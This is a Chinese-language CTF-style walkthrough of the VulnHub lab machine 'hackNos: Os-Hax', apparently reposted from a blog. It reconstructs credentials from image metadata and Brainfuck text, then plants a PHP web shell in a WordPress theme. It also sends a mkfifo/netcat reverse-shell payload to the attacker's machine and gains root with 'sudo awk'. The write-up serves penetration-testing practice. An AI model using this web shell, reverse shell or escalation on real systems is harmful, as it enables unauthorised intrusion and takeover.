其他分享
首页 > 其他分享> > Os-Hax

Os-Hax

作者:互联网

Os-Hax

目录

下载地址:hackNos: Os-Hax ~ VulnHub

1 信息收集

image-20220213122008295

1.1 端口扫描

image-20220226231427912

1.2 后台目录扫描

Target: http://192.168.0.3/

[10:31:44] Starting: 
[10:31:58] 200 -  736B  - /html/
[10:31:58] 200 -    3KB - /index.html
[10:31:59] 200 -    2KB - /js/
[10:32:12] 200 -   11KB - /wordpress/
[10:32:12] 200 -    3KB - /wordpress/wp-login.php

1.2.1 目录分析

  1. 根据扫描出来的目标,得知该网站使用了wordpress,使用wpscan扫描下:

    发现一个XML-RPC_Pingback_API的漏洞
    

    image-20220227112353633

  2. 存在目录列表漏洞,在http://192.168.0.3/img/目录下发现flag信息

    image-20220227112934540

    image-20220227113101560

  3. 下载下来分析:发现存在passw@45

    分析软件下载:ExifTool by Phil Harvey

    image-20220227112010067

  4. 在博客页面中发现一个web用户

    image-20220227130340293

  5. 尝试使用web密码登陆失败,尝试访问http://192.168.0.3/passw@45/,得到flag2.txt

    i+++++ +++++ [->++ +++++ +++<] >++++ +++++ +++++ +++++ .<+++ +[->- ---<]
    >--.- --.<+ +++++ [->-- ----< ]>--- -.<++ +[->+ ++<]> +++++ .<+++ ++[->
    +++++ <]>.+ +.+++ +++++ .---- --.<+ ++[-> +++<] >++++ .<+++ ++++[ ->---
    ----< ]>-.< +++[- >---< ]>--- .+.-- --.++ +.<
    
    # 解密后字符
    web:Hacker@4514
    

    解密网站:Brainfuck/Ook! Obfuscation/Encoding splitbrain.org

    image-20220227120222201

  6. 根据http://192.168.0.3/passw@45/hostconfigure.txt配置kali的hosts

    cat /etc/hosts       
    #127.0.0.1      localhost
    192.168.0.3     localhost
    127.0.1.1       kali
    
    # The following lines are desirable for IPv6 capable hosts
    #::1     localhost ip6-localhost ip6-loopback
    
  7. 尝试使用解密的用户密码登陆wordpress后台:http://localhost/wordpress/wp-login.php成功进入后台页面。

    image-20220227130641764

  8. 在正在使用的模板页面中插入php一句话

    # 如在header模板中:
    <?php system($_POST['acmd']); ?>
    

    image-20220227175119429

2 反弹Shell

  1. kali监听nc连接

    nc -nvlp 2333
    
  2. 利用BP反弹shell

    POST /wordpress/ HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 117
    
    acmd=rm+/tmp/getshell%3bmkfifo+/tmp/getshell%3bcat+/tmp/getshell|/bin/sh+-i+2>%261|nc+192.168.0.2+2333+>/tmp/getshell
    

    image-20220227174717480

  3. 利用python更换shell

    python -c "import pty;pty.spawn('/bin/bash')"
    

3 提权

3.1 尝试提权

  1. 利用sudo提权:失败

    sudo su -
    

3.2 收集当前系统信息

  1. 查看目标主机有哪些用户:存在user-a与web用户

    image-20220227181301500

  2. 查看每个用户家目录所存在的文件:web家目录中存在flag3.txt文件,user-a有sudo权限

    image-20220227182411276

  3. 在web家目录下找到flag3.txt

    40740735d446c27cd551f890030f7c75
    # Rahul[空格]James
    Rahul James
    

    image-20220227180236565

    image-20220227180644846

  4. 尝试登录web用户:利用之前收集到的用户与密码成功登录web:Hacker@4514

    image-20220227181549008

  5. 尝试sudo提权:失败

    image-20220227181727099

  6. 查看web所拥有的权限:awk

    image-20220227182938979

3.3 利用sudo awk提权

sudo awk 'BEGIN {system("/bin/bash")}'

image-20220227183434859

标签:web,sudo,192.168,Hax,提权,+++++,Os,目录
来源: https://www.cnblogs.com/f-carey/p/15943037.html